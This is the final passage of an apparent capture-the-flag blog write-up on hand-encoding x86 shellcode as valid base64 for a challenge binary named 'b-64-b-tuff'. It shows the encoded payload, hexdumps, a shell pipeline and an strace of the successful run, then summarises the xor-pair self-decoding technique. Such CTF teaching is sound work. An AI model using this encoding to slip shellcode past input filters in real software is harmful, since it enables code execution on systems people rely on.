hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/A

We're going to add a few 'A's to the end for padding (the character we choose is meaningless), and run it through base64 -d (adding '='s to the end until we stop getting decoding errors):

$ echo 'hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/AAAAAAA=' | base64 -d | hexdump -Cv 00000000 84 00 00 01 7e 40 00 00 0f 3c f3 cf 3c f3 da 84 |....~@...<..<...| 00000010 00 63 8d 7e 40 0b ef 8f 62 10 01 00 06 75 40 08 |.c.~@...b....u@.| 00000020 45 00 00 17 e7 d0 00 00 f6 41 d5 00 00 00 00 21 |E........A.....!| 00000030 00 08 e3 67 54 00 84 50 00 01 7e 7d 00 00 0f 64 |...gT..P..~}...d| 00000040 15 91 2d 90 f5 40 00 00 00 08 63 8d b0 19 d5 00 |..-..@....c.....| 00000050 21 14 00 00 5f 9f 40 00 03 d9 05 64 4b 2d 90 c3 |!..._.@....dK-..| 00000060 d5 00 21 14 00 00 5f 9f 40 00 03 d9 05 64 4b 2c |..!..._.@....dK,| 00000070 b6 43 0c 3d 50 00 00 00 00 00 00 00 00 00 00 00 |.C.=P...........| 00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000000a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000000c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000000d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000000e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000000f0 03 20 80 00 0c fe fb ef bf 00 00 00 00 00 |. ............|

Let's convert that into a string that we can use on the commandline by chaining together a bunch of shell commands:

echo -ne ' hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/AAAAAAA= ' | base64 -d | xxd -g 1 file | cut -b 10-57 | tr -d '

' | sed ' s/ /\\x/g ' \x84\x00\x00\x01\x7e\x40\x00\x00\x0f\x3c\xf3\xcf\x3c\xf3\xda\x84\x00\x63\x8d\x7e\x40\x0b\xef\x8f\x62\x10\x01\x00\x06\x75\x40\x08\x45\x00\x00\x17\xe7\xd0\x00\x00\xf6\x41\xd5\x00\x00\x00\x00\x21\x00\x08\xe3\x67\x54\x00\x84\x50\x00\x01\x7e\x7d\x00\x00\x0f\x64\x15\x91\x2d\x90\xf5\x40\x00\x00\x00\x08\x63\x8d\xb0\x19\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2d\x90\xc3\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2c\xb6\x43\x0c\x3d\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x20\x80\x00\x0c\xfe\xfb\xef\xbf\x00\x00\x00\x00\x00

And, finally, feed all that into b-64-b-tuff:

$ echo -ne ' \x84\x00\x00\x01\x7e\x40\x00\x00\x0f\x3c\xf3\xcf\x3c\xf3\xda\x84\x00\x63\x8d\x7e\x40\x0b\xef\x8f\x62\x10\x01\x00\x06\x75\x40\x08\x45\x00\x00\x17\xe7\xd0\x00\x00\xf6\x41\xd5\x00\x00\x00\x00\x21\x00\x08\xe3\x67\x54\x00\x84\x50\x00\x01\x7e\x7d\x00\x00\x0f\x64\x15\x91\x2d\x90\xf5\x40\x00\x00\x00\x08\x63\x8d\xb0\x19\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2d\x90\xc3\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2c\xb6\x43\x0c\x3d\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x20\x80\x00\x0c\xfe\xfb\xef\xbf\x00\x00\x00\x00\x00 ' | strace ./b-64-b-tuff read ( 0 , " \204\0\0 \1 ~@ \0\0 \1 7< \363 \317 < \363 \332\204\0 c \215 ~@ \v \357\217 b \2 0 \1 \0 \6 u@ \1 0 " ..., 4096 ) = 254 write ( 1 , " Read 254 bytes!

" , 16Read 254 bytes ! ) = 16 write ( 1 , " hAAAAX5AAAAPPPPPPPPahABjjX5AC++P " ..., 340hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/ AAAAAAA = ) = 340 write ( 1 , "

" , 1 ) = 1 exit ( 1094795585 ) = ? +++ exited with 65 +++

And, sure enough, it exited with the status that we wanted! Now that we've encoded 12 bytes of shellcode, we can encode any amount of arbitrary code that we choose to!

Summary

So that, ladies and gentlemen and everyone else, is how to encode some simple shellcode into base64 by hand. My solution does almost exactly those steps, but in an automated fashion. I also found a few shortcuts while writing the blog that aren't included in that code.

To summarize:

Pad the input to a multiple of 4 bytes

Break the input up into 4-byte blocks, and find an xor pair that generates each value

Set ecx to a value that's 0x41 bits before the encoded payload, which is half of the xor pairs

Put the other half the xor pair in-line, loaded into edx and xor'd with the encoded payload

If there are any MSB bits set, set edx to 0x80 and use the stack to shift them into the right place to be inserted with a xor

After all the xors, add padding that's base64-compatible, but is effectively a no-op, to bridge between the decoder and the encoded payload

End with the encoded stub (second half of the xor pairs)

When the code runs, it xors each pair, and writes it in-line to where the encoded value was. It sets the MSB bits as needed. The padding runs, which is an effective no-op, then finally the freshly decoded code runs.

It's complex, but hopefully this blog helps explain it!